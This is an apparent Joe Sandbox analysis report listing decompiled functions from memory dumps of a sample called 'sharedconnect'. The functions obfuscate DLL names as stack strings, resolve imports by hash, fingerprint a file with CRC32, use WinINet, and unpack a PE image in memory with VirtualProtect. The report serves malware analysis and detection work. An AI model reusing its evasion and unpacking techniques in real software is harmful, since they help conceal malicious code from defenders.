Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: CreateMutex_snwprintf
String ID: %$G$\$a$o
API String ID: 451050361-4186019298
Opcode ID: 2f1da2c1434a35a482b056de111a3baaa0aad2fc841cbedc01b1aeea7e8026ac
Instruction ID: e51b58f08634f739e62841f3d23307d979592edd8b99beb2da2ffa8b55a43c90
Opcode Fuzzy Hash: 2f1da2c1434a35a482b056de111a3baaa0aad2fc841cbedc01b1aeea7e8026ac
Instruction Fuzzy Hash: 99F089B0910209DBDB50DF949849BED7BF8EF04704F10409FAA0CF7241D7B186888F98

Uniqueness

Uniqueness Score: -1.00%

Function 01487058, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 24
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E01487058(short __eax) {
				struct HINSTANCE__* _t15;
				void* _t17;
				void* _t20;
				void* _t21;

				 *(_t21 - 0x28) = 0x740077;
				 *((short*)(_t21 - 0x10)) = __eax;
				 *((intOrPtr*)(_t21 - 0x24)) = 0x610073;
				 *((intOrPtr*)(_t21 - 0x20)) = 0x690070;
				 *((intOrPtr*)(_t21 - 0x1c)) = 0x320033;
				 *((intOrPtr*)(_t21 - 0x18)) = 0x64002e;
				 *((intOrPtr*)(_t21 - 0x14)) = 0x6c006c;
				 *((intOrPtr*)(_t21 - 0xc)) = 0xe1944b6c;
				 *((intOrPtr*)(_t21 - 8)) = 0xb934f523;
				 *((intOrPtr*)(_t21 - 4)) = 0x5f0c0bb3;
				_t15 = LoadLibraryW(_t21 - 0x28); // executed
				 *0x148a868 = _t15;
				return E01481620(_t17, _t15, _t21 - 0xc, _t20, 3, 0x4844c8f, 0x148a81c);
			}

0x01487058
0x0148705f
0x01487067
0x0148706e
0x01487075
0x0148707c
0x01487083
0x0148708a
0x01487091
0x01487098
0x0148709f
0x014870b4
0x014870c6

APIs

LoadLibraryW.KERNELBASE(00740077), ref: 0148709F

Strings

., xrefs: 0148707C
p, xrefs: 0148706E
s, xrefs: 01487067
3, xrefs: 01487075
w, xrefs: 01487058
l, xrefs: 01487083

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: .$3$l$p$s$w
API String ID: 1029625771-4241247243
Opcode ID: 2429a4b11fb0881c7a9fc9b7ad7bbe0482e38db23456211c793e6595df3c0b43
Instruction ID: a84936f6c90b6cda97af79145f452a6cc79bd1e0f5cc29f8a990c4c3aabaea8b
Opcode Fuzzy Hash: 2429a4b11fb0881c7a9fc9b7ad7bbe0482e38db23456211c793e6595df3c0b43
Instruction Fuzzy Hash: 75F0F4B4D00208DBDF01DF9094496EDBFB5AB54B08F24425AD508BB214D3BA0645CF95

Uniqueness

Uniqueness Score: -1.00%

Function 01486F19, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 21
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E01486F19(WCHAR* __eax) {
				struct HINSTANCE__* _t11;
				void* _t13;
				void* _t16;
				void* _t17;

				 *((intOrPtr*)(_t17 - 0x20)) = 0x730075;
				 *((intOrPtr*)(_t17 - 0x1c)) = 0x720065;
				 *((intOrPtr*)(_t17 - 0x18)) = 0x6e0065;
				 *((intOrPtr*)(_t17 - 0x14)) = 0x2e0076;
				 *((intOrPtr*)(_t17 - 0x10)) = 0x6c0064;
				 *((intOrPtr*)(_t17 - 0xc)) = 0x6c;
				 *((intOrPtr*)(_t17 - 8)) = 0x4e606efb;
				 *((intOrPtr*)(_t17 - 4)) = 0x7ab57c39;
				_t11 = LoadLibraryW(__eax); // executed
				 *0x148a860 = _t11;
				return E01481620(_t13, _t11, _t17 - 8, _t16, 2, 0x3040902d, 0x148a7d8);
			}

0x01486f19
0x01486f21
0x01486f28
0x01486f2f
0x01486f36
0x01486f3d
0x01486f44
0x01486f4b
0x01486f52
0x01486f67
0x01486f79

APIs

LoadLibraryW.KERNELBASE ref: 01486F52

Strings

v, xrefs: 01486F2F
l, xrefs: 01486F3D
e, xrefs: 01486F28
d, xrefs: 01486F36
e, xrefs: 01486F21
u, xrefs: 01486F19

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: d$e$e$l$u$v
API String ID: 1029625771-2321630952
Opcode ID: 4fa895400cc9de60ac1acee97bdf7ec2ddcc27c2c296b11b6ee86085b4911252
Instruction ID: 065062a0a2d05597a80246f3c8d8cba1f49c599e5ab03403a5d5711501f1cebf
Opcode Fuzzy Hash: 4fa895400cc9de60ac1acee97bdf7ec2ddcc27c2c296b11b6ee86085b4911252
Instruction Fuzzy Hash: 7AF039B0D41309EBEB10DF91E44D6ADBFB2EB04709F24895ED5497B604D7FA06858FA0

Uniqueness

Uniqueness Score: -1.00%

Function 01486DC9, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 21
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E01486DC9(WCHAR* __eax) {
				struct HINSTANCE__* _t11;
				void* _t13;
				void* _t16;
				void* _t17;

				 *((intOrPtr*)(_t17 - 0x20)) = 0x680073;
				 *((intOrPtr*)(_t17 - 0x1c)) = 0x6c0065;
				 *((intOrPtr*)(_t17 - 0x18)) = 0x33006c;
				 *((intOrPtr*)(_t17 - 0x14)) = 0x2e0032;
				 *((intOrPtr*)(_t17 - 0x10)) = 0x6c0064;
				 *((intOrPtr*)(_t17 - 0xc)) = 0x6c;
				 *((intOrPtr*)(_t17 - 8)) = 0x4377f0;
				 *((intOrPtr*)(_t17 - 4)) = 0x327f34b2;
				_t11 = LoadLibraryW(__eax); // executed
				 *0x148a854 = _t11;
				return E01481620(_t13, _t11, _t17 - 8, _t16, 2, 0x1df027f1, 0x148a678);
			}

0x01486dc9
0x01486dd1
0x01486dd8
0x01486ddf
0x01486de6
0x01486ded
0x01486df4
0x01486dfb
0x01486e02
0x01486e17
0x01486e29

APIs

LoadLibraryW.KERNELBASE ref: 01486E02

Strings

e, xrefs: 01486DD1
l, xrefs: 01486DD8
l, xrefs: 01486DED
s, xrefs: 01486DC9
2, xrefs: 01486DDF
d, xrefs: 01486DE6

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: 2$d$e$l$l$s
API String ID: 1029625771-1854679484
Opcode ID: e487a537ade2b918f5a0b67969f82d0e499f2578f5014884d3ef9da3eabfc32a
Instruction ID: 2bf00ba90135be70259d85a49f9f83806eeae01232f613d21ca5b74f5d07a3dd
Opcode Fuzzy Hash: e487a537ade2b918f5a0b67969f82d0e499f2578f5014884d3ef9da3eabfc32a
Instruction Fuzzy Hash: 8AF01CB0D41209EBDB00DF9195496ADBFB2FB44708F10814E99487B200D7FA02498FA5

Uniqueness

Uniqueness Score: -1.00%

Function 01486EA8, Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 21
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E01486EA8(short __eax) {
				struct HINSTANCE__* _t12;
				void* _t14;
				void* _t17;
				void* _t18;

				 *(_t18 - 0x1c) = 0x720075;
				 *((short*)(_t18 - 8)) = __eax;
				 *((intOrPtr*)(_t18 - 0x18)) = 0x6d006c;
				 *((intOrPtr*)(_t18 - 0x14)) = 0x6e006f;
				 *((intOrPtr*)(_t18 - 0x10)) = 0x64002e;
				 *((intOrPtr*)(_t18 - 0xc)) = 0x6c006c;
				 *((intOrPtr*)(_t18 - 4)) = 0x925edb63;
				_t12 = LoadLibraryW(_t18 - 0x1c); // executed
				 *0x148a85c = _t12;
				return E01481620(_t14, _t12, _t18 - 4, _t17, 1, 0xe7f4d45, 0x148a7d4);
			}

0x01486ea8
0x01486eaf
0x01486eb7
0x01486ebe
0x01486ec5
0x01486ecc
0x01486ed3
0x01486eda
0x01486eef
0x01486f01

APIs

LoadLibraryW.KERNELBASE(00720075), ref: 01486EDA

Strings

u, xrefs: 01486EA8
., xrefs: 01486EC5
l, xrefs: 01486EB7
l, xrefs: 01486ECC
o, xrefs: 01486EBE

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: .$l$l$o$u
API String ID: 1029625771-3769830063
Opcode ID: cf46a5813b542b85624f7ae65a0b15da3b97570742fa40feda4b1b56a40547e1
Instruction ID: 271024c310552fa59b8503375bd53a7c00656a56ad407e3c4e2f5a8ef5aa5e96
Opcode Fuzzy Hash: cf46a5813b542b85624f7ae65a0b15da3b97570742fa40feda4b1b56a40547e1
Instruction Fuzzy Hash: C1F0C0B0D41209EFDB10DFD194496EDBBB6EB44708F10415ED61877324E7F606858F95

Uniqueness

Uniqueness Score: -1.00%

Function 01487DC4, Relevance: 9.0, APIs: 6, Instructions: 22
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E01487DC4() {
				void* _t1;
				int _t3;
				void* _t7;
				void* _t9;
				void* _t11;

				_t1 = MapViewOfFile(); // executed
				_t7 = _t1;
				if(_t7 != 0) {
					 *0x148a838 = RtlComputeCrc32(0, _t7, GetFileSize(_t11, 0));
					UnmapViewOfFile(_t7);
				}
				FindCloseChangeNotification(_t9); // executed
				_t3 = CloseHandle(_t11);
				return _t3;
			}

0x01487dc4
0x01487dca
0x01487dce
0x01487de4
0x01487de9
0x01487de9
0x01487df0
0x01487df8
0x01487e00

APIs

MapViewOfFile.KERNELBASE ref: 01487DC4
GetFileSize.KERNEL32(?,00000000), ref: 01487DD3
RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 01487DDD
UnmapViewOfFile.KERNEL32(00000000,?,00000000), ref: 01487DE9
FindCloseChangeNotification.KERNELBASE ref: 01487DF0
CloseHandle.KERNEL32 ref: 01487DF8

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: File$CloseView$ChangeComputeCrc32FindHandleNotificationSizeUnmap
String ID:
API String ID: 1059615168-0
Opcode ID: 09f05841dd654b99add8ccf1ec333b5e242d72a3a2314a5bd5549cd50f2ef3bd
Instruction ID: f5cf266c0eda85028a576c3105ea128985685c795a9d5fb67c3b2228152a6f1b
Opcode Fuzzy Hash: 09f05841dd654b99add8ccf1ec333b5e242d72a3a2314a5bd5549cd50f2ef3bd
Instruction Fuzzy Hash: 08E0BF72500200ABD3213BA4B88CB6E7B7CEB48616F34401BF7069216CCBB484029761

Uniqueness

Uniqueness Score: -1.00%

Function 014872E0, Relevance: 7.5, APIs: 5, Instructions: 37
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E014872E0(void* __eflags) {
				void* _t1;
				void* _t2;
				long _t4;
				void* _t5;
				long _t9;
				int _t11;

				_t11 = 0; // executed
				_t2 = L01487160(_t1); // executed
				if(_t2 != 0) {
					_t4 = WaitForSingleObject( *0x148a834, 0);
					if(_t4 == 0 || _t4 == 0x80) {
						_t5 = L014871E0(_t4); // executed
						if(_t5 != 0) {
							if(L01487260(_t5) != 0) {
								_t9 = SignalObjectAndWait( *0x148a82c,  *0x148a828, 0xffffffff, 0);
								if(_t9 == 0 || _t9 == 0x80) {
									_t11 = ResetEvent( *0x148a82c);
								}
							}
							ReleaseMutex( *0x148a834);
							CloseHandle( *0x148a834);
						}
					}
				}
				return _t11;
			}

0x014872e1
0x014872e3
0x014872ea
0x014872f3
0x014872fb
0x01487304
0x0148730b
0x01487314
0x01487326
0x0148732e
0x01487343
0x01487343
0x0148732e
0x0148734b
0x01487357
0x01487357
0x0148730b
0x014872fb
0x01487360

APIs

WaitForSingleObject.KERNEL32(00000000,?,014874E0,?,01487B68), ref: 014872F3
SignalObjectAndWait.KERNEL32(000000FF,00000000,?,014874E0,?,01487B68), ref: 01487326
ResetEvent.KERNEL32(?,014874E0,?,01487B68), ref: 0148733D
ReleaseMutex.KERNEL32(?,014874E0,?,01487B68), ref: 0148734B
CloseHandle.KERNEL32(?,014874E0,?,01487B68), ref: 01487357

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: ObjectWait$CloseEventHandleMutexReleaseResetSignalSingle
String ID:
API String ID: 3756552044-0
Opcode ID: 2108a5286f12fff528d52a590b6f58fd34d19bd1953d5303f7787dc244f9b37e
Instruction ID: ac3524a2e147c33fa319e2abec22de1cef63f2783139d839ab8fe40e636303f8
Opcode Fuzzy Hash: 2108a5286f12fff528d52a590b6f58fd34d19bd1953d5303f7787dc244f9b37e
Instruction Fuzzy Hash: 3DF04F311101119BEF323B69AC59B2E3E65EB11652F38002BEE01D22B8EA75C811D762

Uniqueness

Uniqueness Score: -1.00%

Function 01482536, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 79
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E01482536(intOrPtr __ecx) {
				intOrPtr* _t24;
				intOrPtr _t26;
				intOrPtr _t30;
				int _t36;
				signed int _t38;
				intOrPtr* _t40;
				intOrPtr* _t45;
				signed int _t51;
				intOrPtr* _t52;
				signed int _t54;
				intOrPtr* _t56;
				intOrPtr* _t58;
				WCHAR* _t59;
				void* _t60;

				 *((intOrPtr*)(_t60 - 4)) = 0;
				_t38 = 0;
				 *((intOrPtr*)(_t60 - 0xc)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0;
				_t24 = __ecx + 4;
				_t51 = 0;
				 *((intOrPtr*)(_t60 - 0x10)) = _t24;
				 *_t24 = 0; // executed
				L01481B30(0x14824a0, _t60 - 4); // executed
				_t56 =  *((intOrPtr*)(_t60 - 4));
				while(_t56 != 0) {
					_t6 = _t56 + 4; // 0x4
					_t36 = lstrlenW(_t6);
					_t56 =  *_t56;
					_t38 = _t38 + 1 + _t36;
				}
				_t26 = E01481850(_t38 + _t38);
				 *((intOrPtr*)(_t60 - 8)) = _t26;
				if(_t26 == 0) {
					_t52 =  *((intOrPtr*)(_t60 - 0xc));
				} else {
					_t40 =  *((intOrPtr*)(_t60 - 4));
					while(_t40 != 0) {
						_t10 = _t40 + 4; // 0x4
						_t59 = _t10;
						lstrcpyW(_t26 + _t51 * 2, _t59);
						_t54 = _t51 + lstrlenW(_t59);
						_t26 =  *((intOrPtr*)(_t60 - 8));
						 *((short*)(_t26 + _t54 * 2)) = 0x2c;
						_t51 = _t54 + 1;
						_t40 =  *_t40;
					}
					_push( *((intOrPtr*)(_t60 - 0x10)));
					_push(_t51);
					_t30 = L014826B0(_t26);
					_t52 =  *((intOrPtr*)(_t60 - 0xc));
					 *_t52 = _t30;
					E014818C0( *((intOrPtr*)(_t60 - 8)));
				}
				_t45 =  *((intOrPtr*)(_t60 - 4));
				if(_t45 != 0) {
					do {
						_t58 =  *_t45;
						E014818C0(_t45);
						_t45 = _t58;
					} while (_t58 != 0);
				}
				return 0 |  *_t52 != 0x00000000;
			}

0x01482538
0x01482540
0x01482542
0x01482546
0x0148254b
0x01482554
0x01482556
0x01482559
0x0148255b
0x01482560
0x01482565
0x01482570
0x01482574
0x0148257a
0x0148257d
0x0148257f
0x01482586
0x0148258b
0x01482590
0x014825e7
0x01482592
0x01482592
0x01482597
0x014825a0
0x014825a0
0x014825a8
0x014825b5
0x014825bc
0x014825bf
0x014825c3
0x014825c4
0x014825c6
0x014825ca
0x014825cf
0x014825d0
0x014825d5
0x014825de
0x014825e0
0x014825e0
0x014825ea
0x014825ef
0x014825f1
0x014825f1
0x014825f3
0x014825f8
0x014825fa
0x014825f1
0x0148260b

APIs

lstrlenW.KERNEL32(00000004), ref: 01482574
lstrcpyW.KERNEL32(00000000,00000004), ref: 014825A8
lstrlenW.KERNEL32(00000004), ref: 014825AF

Strings

o, xrefs: 0148254E

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy
String ID: o
API String ID: 805584807-2084137227
Opcode ID: e33e04c019029e026e7e5873c720f3a571342df4670140b107fe03b044b069a0
Instruction ID: 2d2b6cb89b8229f2a22d4d999439d5ea80ad39366c0f0e5a50c31afe66f47553
Opcode Fuzzy Hash: e33e04c019029e026e7e5873c720f3a571342df4670140b107fe03b044b069a0
Instruction Fuzzy Hash: C0219235E00215EFDB21EFA9C890A9EB7F4FF54710B15446ED906EB320DB70AA05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01472631, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E01472631(intOrPtr _a4) {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				char _v72;
				long _v76;
				intOrPtr _v80;
				void* _v84;
				char* _v88;
				DWORD* _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr* _v104;
				intOrPtr _v108;
				intOrPtr* _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				int _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				signed int _v156;
				signed int _v160;
				intOrPtr _v164;
				int _v168;
				intOrPtr _v172;
				char _v176;
				intOrPtr _t98;
				void* _t99;
				intOrPtr _t107;
				intOrPtr _t108;
				int _t113;
				int _t129;
				intOrPtr _t153;
				intOrPtr _t155;
				intOrPtr _t159;
				void* _t162;
				intOrPtr _t181;
				unsigned int _t183;
				intOrPtr _t188;
				void* _t199;
				intOrPtr _t203;

				_t98 = _a4;
				_v76 = 0;
				_v72 = 1;
				asm("movaps xmm0, [0x1474000]");
				asm("movups [ebp-0x34], xmm0");
				_v80 = _t98;
				_t99 =  *((intOrPtr*)(_t98 + 0x30));
				_v176 = _t99;
				_v84 = _t99;
				_v172 = _v80;
				_v88 =  &_v72;
				_v92 =  &_v76;
				_v96 =  *((intOrPtr*)(_t98 + 0x20));
				_v100 =  *((intOrPtr*)(_t98 + 0x34));
				_v104 = _t98 + 0x30;
				E014723BE(); // executed
				E014718EE(_v84);
				_t203 = _t199 - 8 + 8 - 4 + 4;
				_t162 = _v84;
				_t188 =  *((intOrPtr*)(_t162 + 0x3c));
				_v108 = _t162 + _t188;
				_v112 = _v84 + 0x3c;
				_v116 = 0x18;
				if(_t188 + 0xffffffc0 <= 0xfc0) {
					_t159 = _v108;
					_t132 =  ==  ? _t159 + 0x18 : 0x18;
					_v116 =  ==  ? _t159 + 0x18 : 0x18;
				}
				_v120 = _v116;
				if(_v100 == 0) {
					L4:
					_v132 =  *_v104;
					_v136 = 0;
					do {
						_t107 = _v136;
						 *((char*)(_v132 + _t107)) =  *((intOrPtr*)(_v84 + _t107));
						_t108 = _t107 + 1;
						_v136 = _t108;
					} while (_t108 != 0x400);
					_t110 =  ==  ? _v84 +  *_v112 : 0;
					 *((intOrPtr*)(( ==  ? _v84 +  *_v112 : 0) + 0x34)) =  *_v104;
					_t113 = VirtualProtect(_v84, 0x400, 2,  &_v76); // executed
					_t181 = _v80;
					_v40 =  *((intOrPtr*)(_t181 + 0x60));
					_v36 =  *((intOrPtr*)(_t181 + 0x64));
					_v32 =  *((intOrPtr*)(_t181 + 0x68));
					_v28 =  *((intOrPtr*)(_t181 + 0x5c));
					_v24 =  *((intOrPtr*)(_t181 + 0x58));
					_v20 = _v84 +  *((intOrPtr*)(_t181 + 0x38));
					 *((intOrPtr*)(_t203 - 0xc)) = _t181;
					_v176 = 0;
					_v172 = 0x6c;
					_v140 = _t113;
					_v144 = 0;
					_v148 = 0x6c;
					E0147104C();
					_t203 =  *((intOrPtr*)( &_v40 + 0x10));
					goto __eax;
				} else {
					_t176 =  ==  ? _v108 : 0;
					_v124 = ( *(( ==  ? _v108 : 0) + 0x14) & 0x0000ffff) + _v120;
					_v128 = 0;
					while(1) {
						_t153 = _v124;
						_t183 =  *(_t153 + 0x24);
						_v152 = _v128;
						_v156 = _t183 >> 0x0000001e & 0x00000001;
						_v160 = _t183 >> 0x1f;
						_v164 = _t153;
						_t129 = VirtualProtect(_v84 +  *((intOrPtr*)(_t153 + 0xc)),  *(_t153 + 8),  *( &_v72 + (_v156 << 4) + (_v160 << 3) + ((_t183 >> 0x0000001d & 0x00000001) << 2)),  &_v76); // executed
						_t155 = _v152 + 1;
						_v168 = _t129;
						_v124 = _v164 + 0x28;
						_v128 = _t155;
						if(_t155 == _v100) {
							goto L4;
						}
					}
					goto L4;
				}
			}

0x0147263d
0x01472646
0x01472653
0x0147265a
0x01472661
0x0147266a
0x0147266d
0x01472673
0x01472676
0x0147267c
0x01472680
0x01472683
0x01472686
0x01472689
0x0147268c
0x0147268f
0x014726a0
0x014726a5
0x014726b3
0x014726b6
0x014726c4
0x014726c7
0x014726ca
0x014726cd
0x014726d4
0x014726e2
0x014726e5
0x014726e5
0x014726f1
0x014726f4
0x0147271c
0x01472723
0x01472726
0x0147272c
0x0147272c
0x0147273b
0x0147273e
0x01472746
0x01472746
0x01472769
0x0147276c
0x0147277e
0x0147278a
0x01472793
0x01472799
0x0147279f
0x014727a5
0x014727ab
0x014727ae
0x014727b4
0x014727b7
0x014727bf
0x014727c7
0x014727cd
0x014727d3
0x014727d9
0x014727ef
0x014727f5
0x014726f6
0x01472705
0x01472711
0x01472714
0x01472802
0x01472805
0x01472811
0x01472817
0x01472825
0x01472836
0x01472862
0x01472868
0x01472870
0x01472881
0x01472887
0x0147288a
0x0147288d
0x00000000
0x00000000
0x01472893
0x00000000
0x01472802

APIs

Part of subcall function 014723BE: VirtualAlloc.KERNELBASE(00000000,00010000,00001000,00000040), ref: 014723F6

VirtualProtect.KERNELBASE(?,00000400,00000002,00000000), ref: 0147277E
VirtualProtect.KERNELBASE(?,?,00000001,00000000), ref: 01472868

Strings

l, xrefs: 014727BF

Memory Dump Source

Source File: 00000007.00000002.742455071.0000000001470000.00000040.00000001.sdmp, Offset: 01470000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1470000_sharedconnect.jbxd

Similarity

API ID: Virtual$Protect$Alloc
String ID: l
API String ID: 2541858876-2517025534
Opcode ID: 976dd282226d16b9382bd80b8f7d9b01fc2e4f9d6214695e744384316cd87c3f
Instruction ID: 47ade2cec7bca1aa5ad798ce3110dc646945696d00856cb95aac64dc8d89daf9
Opcode Fuzzy Hash: 976dd282226d16b9382bd80b8f7d9b01fc2e4f9d6214695e744384316cd87c3f
Instruction Fuzzy Hash: C181F5B4E002188FDB14CFA9C980A9DFBF1FF88304F1585AAD909AB356D771A945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01481809, Relevance: 4.5, APIs: 3, Instructions: 24
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E01481809(void* __edx, void* __esi, void* __eflags) {
				void* _t5;
				void* _t6;
				void* _t13;
				void* _t20;
				void* _t22;
				intOrPtr _t23;
				void* _t25;

				_t22 = __esi;
				_t6 = L01481650(_t5, __esi, __edx);
				_t29 = _t6 - 0xc8;
				if(_t6 == 0xc8) {
					 *((intOrPtr*)(_t25 - 4)) = L014816D0(__esi,  *((intOrPtr*)(_t25 + 0x1c)), _t29);
				}
				InternetCloseHandle(_t22); // executed
				InternetCloseHandle(_t13);
				_t23 =  *((intOrPtr*)(_t25 - 4));
				InternetCloseHandle(_t20);
				E014818C0( *((intOrPtr*)(_t25 - 0xc)));
				return _t23;
			}

0x01481809
0x0148180b
0x01481810
0x01481815
0x01481821
0x01481821
0x01481825
0x0148182c
0x01481832
0x01481836
0x0148183f
0x0148184c

APIs

InternetCloseHandle.WININET ref: 01481825
InternetCloseHandle.WININET(00000000), ref: 0148182C
InternetCloseHandle.WININET ref: 01481836

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: CloseHandleInternet
String ID:
API String ID: 1081599783-0
Opcode ID: 03d0078648f88b80b22f0003bd7a35cdfbfe9d75556e66d003f1fb75ba73ef95
Instruction ID: 42cb5486671f4676fbe8dee7cd7c53be4aa0bac6e13c259e6a5124f52bf1cf7c
Opcode Fuzzy Hash: 03d0078648f88b80b22f0003bd7a35cdfbfe9d75556e66d003f1fb75ba73ef95
Instruction Fuzzy Hash: 3FE04FB5B10014DFCF11BFA5E5484AEB3A4EF64A51F24816FE90693320CB784E038BB6

Uniqueness

Uniqueness Score: -1.00%

Function 01487B40, Relevance: 4.5, APIs: 3, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_() {
				int _t3;
				void* _t4;
				void* _t6;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t10;

				L01487800(_t7);
				L01487870(_t7); // executed
				_t3 = L01481030(); // executed
				if(_t3 != 0) {
					_t4 = L01481100(); // executed
					_t12 = _t4;
					if(_t4 != 0) {
						E014874D0(_t6, _t7, _t8, _t9, _t10, _t12); // executed
					}
					ExitProcess(0);
				}
				ExitProcess(_t3); // executed
			}

0x01487b40
0x01487b45
0x01487b4a
0x01487b51
0x01487b5a
0x01487b5f
0x01487b61
0x01487b63
0x01487b63
0x01487b6a
0x01487b6a
0x01487b54

APIs

ExitProcess.KERNEL32 ref: 01487B54
ExitProcess.KERNEL32 ref: 01487B6A

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: f531f9be2d2586d60c6a9c2dfe806ef5a6925ef3d312cc41d05f3ca52cdf3f6b
Instruction ID: 40e5032b31d0a43c185db5f337b2922b13e4f381bd953b4e745fdde60d08e158
